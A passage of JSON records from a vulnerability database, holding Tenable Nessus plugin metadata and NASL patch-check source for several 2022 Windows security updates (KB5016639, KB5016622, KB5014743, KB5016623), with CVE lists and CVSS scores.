audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3',\n sp:0,\n rollup_date:'08_2022',\n bulletin:bulletin,\n rollup_kb_list:[5016683, 5016681])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-10T19:27:16", "description": "The remote Windows host is missing security update 5016639. 
It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows Bluetooth Service Remote Code Execution Vulnerability (CVE-2022-30144)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "nessus", "title": "KB5016639: Windows 10 LTS 1507 Security Update (August 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-30133", "CVE-2022-30144", "CVE-2022-30194", "CVE-2022-33670", "CVE-2022-34690", "CVE-2022-34691", "CVE-2022-34696", "CVE-2022-34701", "CVE-2022-34702", "CVE-2022-34703", "CVE-2022-34704", "CVE-2022-34706", "CVE-2022-34707", "CVE-2022-34708", "CVE-2022-34709", "CVE-2022-34710", "CVE-2022-34713", "CVE-2022-34714", "CVE-2022-35743", "CVE-2022-35744", "CVE-2022-35745", "CVE-2022-35746", "CVE-2022-35747", "CVE-2022-35749", "CVE-2022-35750", "CVE-2022-35751", "CVE-2022-35752", "CVE-2022-35753", "CVE-2022-35754", "CVE-2022-35755", "CVE-2022-35756", "CVE-2022-35758", "CVE-2022-35759", "CVE-2022-35760", "CVE-2022-35767", "CVE-2022-35768", "CVE-2022-35769", "CVE-2022-35771", "CVE-2022-35793", "CVE-2022-35795"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*"], "id": "SMB_NT_MS22_AUG_5016639.NASL", "href": 
"https://www.tenable.com/plugins/nessus/163941", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163941);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2022-30133\",\n \"CVE-2022-30144\",\n \"CVE-2022-30194\",\n \"CVE-2022-33670\",\n \"CVE-2022-34690\",\n \"CVE-2022-34691\",\n \"CVE-2022-34696\",\n \"CVE-2022-34701\",\n \"CVE-2022-34702\",\n \"CVE-2022-34703\",\n \"CVE-2022-34704\",\n \"CVE-2022-34706\",\n \"CVE-2022-34707\",\n \"CVE-2022-34708\",\n \"CVE-2022-34709\",\n \"CVE-2022-34710\",\n \"CVE-2022-34713\",\n \"CVE-2022-34714\",\n \"CVE-2022-35743\",\n \"CVE-2022-35744\",\n \"CVE-2022-35745\",\n \"CVE-2022-35746\",\n \"CVE-2022-35747\",\n \"CVE-2022-35749\",\n \"CVE-2022-35750\",\n \"CVE-2022-35751\",\n \"CVE-2022-35752\",\n \"CVE-2022-35753\",\n \"CVE-2022-35754\",\n \"CVE-2022-35755\",\n \"CVE-2022-35756\",\n \"CVE-2022-35758\",\n \"CVE-2022-35759\",\n \"CVE-2022-35760\",\n \"CVE-2022-35767\",\n \"CVE-2022-35768\",\n \"CVE-2022-35769\",\n \"CVE-2022-35771\",\n \"CVE-2022-35793\",\n \"CVE-2022-35795\"\n );\n script_xref(name:\"MSKB\", value:\"5016639\");\n script_xref(name:\"MSFT\", value:\"MS22-5016639\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/30\");\n script_xref(name:\"IAVA\", value:\"2022-A-0320-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0319-S\");\n\n script_name(english:\"KB5016639: Windows 10 LTS 1507 Security Update (August 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5016639. 
It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows Bluetooth Service Remote Code Execution Vulnerability (CVE-2022-30144)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5016639\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5016639\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5016639\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30133\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-08';\nkbs = make_list(\n '5016639'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:10240,\n rollup_date:'08_2022',\n bulletin:bulletin,\n rollup_kb_list:[5016639])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-10T19:26:01", "description": "The remote Windows host is missing security update 5016622. 
It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows Bluetooth Service Remote Code Execution Vulnerability (CVE-2022-30144)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "nessus", "title": "KB5016622: Windows 10 Version 1607 and Windows Server 2016 Security Update (August 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-30133", "CVE-2022-30144", "CVE-2022-30194", "CVE-2022-33670", "CVE-2022-34690", "CVE-2022-34691", "CVE-2022-34696", "CVE-2022-34699", "CVE-2022-34701", "CVE-2022-34702", "CVE-2022-34703", "CVE-2022-34704", "CVE-2022-34706", "CVE-2022-34707", "CVE-2022-34708", "CVE-2022-34709", "CVE-2022-34710", "CVE-2022-34713", "CVE-2022-34714", "CVE-2022-35743", "CVE-2022-35744", "CVE-2022-35745", "CVE-2022-35746", "CVE-2022-35747", "CVE-2022-35748", "CVE-2022-35749", "CVE-2022-35750", "CVE-2022-35751", "CVE-2022-35752", "CVE-2022-35753", "CVE-2022-35754", "CVE-2022-35755", "CVE-2022-35756", "CVE-2022-35758", "CVE-2022-35759", "CVE-2022-35760", "CVE-2022-35761", "CVE-2022-35762", "CVE-2022-35763", "CVE-2022-35764", "CVE-2022-35765", "CVE-2022-35767", "CVE-2022-35768", "CVE-2022-35769", "CVE-2022-35771", "CVE-2022-35792", "CVE-2022-35793", "CVE-2022-35795"], 
"modified": "2022-12-07T00:00:00", "cpe": ["cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*"], "id": "SMB_NT_MS22_AUG_5016622.NASL", "href": "https://www.tenable.com/plugins/nessus/163940", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163940);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2022-30133\",\n \"CVE-2022-30144\",\n \"CVE-2022-30194\",\n \"CVE-2022-33670\",\n \"CVE-2022-34690\",\n \"CVE-2022-34691\",\n \"CVE-2022-34696\",\n \"CVE-2022-34699\",\n \"CVE-2022-34701\",\n \"CVE-2022-34702\",\n \"CVE-2022-34703\",\n \"CVE-2022-34704\",\n \"CVE-2022-34706\",\n \"CVE-2022-34707\",\n \"CVE-2022-34708\",\n \"CVE-2022-34709\",\n \"CVE-2022-34710\",\n \"CVE-2022-34713\",\n \"CVE-2022-34714\",\n \"CVE-2022-35743\",\n \"CVE-2022-35744\",\n \"CVE-2022-35745\",\n \"CVE-2022-35746\",\n \"CVE-2022-35747\",\n \"CVE-2022-35748\",\n \"CVE-2022-35749\",\n \"CVE-2022-35750\",\n \"CVE-2022-35751\",\n \"CVE-2022-35752\",\n \"CVE-2022-35753\",\n \"CVE-2022-35754\",\n \"CVE-2022-35755\",\n \"CVE-2022-35756\",\n \"CVE-2022-35758\",\n \"CVE-2022-35759\",\n \"CVE-2022-35760\",\n \"CVE-2022-35761\",\n \"CVE-2022-35762\",\n \"CVE-2022-35763\",\n \"CVE-2022-35764\",\n \"CVE-2022-35765\",\n \"CVE-2022-35767\",\n \"CVE-2022-35768\",\n \"CVE-2022-35769\",\n \"CVE-2022-35771\",\n \"CVE-2022-35792\",\n \"CVE-2022-35793\",\n \"CVE-2022-35795\"\n );\n script_xref(name:\"MSKB\", value:\"5016622\");\n script_xref(name:\"MSFT\", value:\"MS22-5016622\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/30\");\n script_xref(name:\"IAVA\", value:\"2022-A-0320-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0319-S\");\n\n script_name(english:\"KB5016622: Windows 
10 Version 1607 and Windows Server 2016 Security Update (August 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5016622. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows Bluetooth Service Remote Code Execution Vulnerability (CVE-2022-30144)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5016622\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5016622\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5016622\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30133\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/09\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-08';\nkbs = make_list(\n '5016622'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:14393,\n rollup_date:'08_2022',\n bulletin:bulletin,\n rollup_kb_list:[5016622])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-16T17:49:06", "description": "The remote Windows host is missing security update 5014743. 
It is, therefore, affected by multiple vulnerabilities\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30141, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\n - Local Security Authority Subsystem Service Elevation of Privilege Vulnerability (CVE-2022-30166)\n\n - Windows Advanced Local Procedure Call Elevation of Privilege Vulnerability (CVE-2022-30160)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-14T00:00:00", "type": "nessus", "title": "KB5014743: Windows Server 2008 Security Update (June 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21123", "CVE-2022-21125", "CVE-2022-21127", "CVE-2022-21166", "CVE-2022-30140", "CVE-2022-30141", "CVE-2022-30143", "CVE-2022-30146", "CVE-2022-30147", "CVE-2022-30149", "CVE-2022-30151", "CVE-2022-30152", "CVE-2022-30153", "CVE-2022-30155", "CVE-2022-30160", "CVE-2022-30161", "CVE-2022-30166", "CVE-2022-30190"], 
"modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUN_5014743.NASL", "href": "https://www.tenable.com/plugins/nessus/162193", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162193);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21123\",\n \"CVE-2022-21125\",\n \"CVE-2022-21127\",\n \"CVE-2022-21166\",\n \"CVE-2022-30140\",\n \"CVE-2022-30141\",\n \"CVE-2022-30143\",\n \"CVE-2022-30146\",\n \"CVE-2022-30147\",\n \"CVE-2022-30149\",\n \"CVE-2022-30151\",\n \"CVE-2022-30152\",\n \"CVE-2022-30153\",\n \"CVE-2022-30155\",\n \"CVE-2022-30160\",\n \"CVE-2022-30161\",\n \"CVE-2022-30166\",\n \"CVE-2022-30190\"\n );\n script_xref(name:\"MSKB\", value:\"5014743\");\n script_xref(name:\"MSKB\", value:\"5014752\");\n script_xref(name:\"MSFT\", value:\"MS22-5014743\");\n script_xref(name:\"MSFT\", value:\"MS22-5014752\");\n script_xref(name:\"IAVA\", value:\"2022-A-0240-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0241-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/05\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0022\");\n\n script_name(english:\"KB5014743: Windows Server 2008 Security Update (June 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5014743. 
It is, therefore, affected by multiple vulnerabilities\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30141,\n CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\n - Local Security Authority Subsystem Service Elevation of Privilege Vulnerability (CVE-2022-30166)\n\n - Windows Advanced Local Procedure Call Elevation of Privilege Vulnerability (CVE-2022-30160)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014743\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014752\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5014743 or Cumulative Update 5014752\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30190\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30161\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word MSDTJS');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", 
value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-06';\nkbs = make_list(\n '5014752',\n '5014743'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0',\n sp:2,\n rollup_date:'06_2022',\n bulletin:bulletin,\n rollup_kb_list:[5014752, 5014743])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n 
hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-10T19:25:59", "description": "The remote Windows host is missing security update 5016623. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows Bluetooth Service Remote Code Execution Vulnerability (CVE-2022-30144)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "nessus", "title": "KB5016623: Windows 10 version 1809 / Windows Server 2019 Security Update (August 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-30133", "CVE-2022-30144", "CVE-2022-30194", "CVE-2022-30197", "CVE-2022-33670", "CVE-2022-34690", "CVE-2022-34691", "CVE-2022-34696", "CVE-2022-34699", "CVE-2022-34701", "CVE-2022-34702", "CVE-2022-34703", "CVE-2022-34704", "CVE-2022-34705", "CVE-2022-34706", "CVE-2022-34707", "CVE-2022-34708", "CVE-2022-34709", "CVE-2022-34710", "CVE-2022-34713", "CVE-2022-34714", "CVE-2022-35743", "CVE-2022-35744", "CVE-2022-35745", "CVE-2022-35746", "CVE-2022-35747", "CVE-2022-35748", "CVE-2022-35749", "CVE-2022-35750", "CVE-2022-35751", "CVE-2022-35752", "CVE-2022-35753", "CVE-2022-35754", 
"CVE-2022-35755", "CVE-2022-35756", "CVE-2022-35757", "CVE-2022-35758", "CVE-2022-35759", "CVE-2022-35760", "CVE-2022-35761", "CVE-2022-35762", "CVE-2022-35763", "CVE-2022-35764", "CVE-2022-35765", "CVE-2022-35766", "CVE-2022-35767", "CVE-2022-35768", "CVE-2022-35769", "CVE-2022-35771", "CVE-2022-35792", "CVE-2022-35793", "CVE-2022-35794", "CVE-2022-35795", "CVE-2022-35797"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*"], "id": "SMB_NT_MS22_AUG_5016623.NASL", "href": "https://www.tenable.com/plugins/nessus/163946", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163946);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2022-30133\",\n \"CVE-2022-30144\",\n \"CVE-2022-30194\",\n \"CVE-2022-30197\",\n \"CVE-2022-33670\",\n \"CVE-2022-34690\",\n \"CVE-2022-34691\",\n \"CVE-2022-34696\",\n \"CVE-2022-34699\",\n \"CVE-2022-34701\",\n \"CVE-2022-34702\",\n \"CVE-2022-34703\",\n \"CVE-2022-34704\",\n \"CVE-2022-34705\",\n \"CVE-2022-34706\",\n \"CVE-2022-34707\",\n \"CVE-2022-34708\",\n \"CVE-2022-34709\",\n \"CVE-2022-34710\",\n \"CVE-2022-34713\",\n \"CVE-2022-34714\",\n \"CVE-2022-35743\",\n \"CVE-2022-35744\",\n \"CVE-2022-35745\",\n \"CVE-2022-35746\",\n \"CVE-2022-35747\",\n \"CVE-2022-35748\",\n \"CVE-2022-35749\",\n \"CVE-2022-35750\",\n \"CVE-2022-35751\",\n \"CVE-2022-35752\",\n \"CVE-2022-35753\",\n \"CVE-2022-35754\",\n \"CVE-2022-35755\",\n \"CVE-2022-35756\",\n \"CVE-2022-35757\",\n \"CVE-2022-35758\",\n \"CVE-2022-35759\",\n \"CVE-2022-35760\",\n \"CVE-2022-35761\",\n \"CVE-2022-35762\",\n \"CVE-2022-35763\",\n \"CVE-2022-35764\",\n \"CVE-2022-35765\",\n \"CVE-2022-35766\",\n 
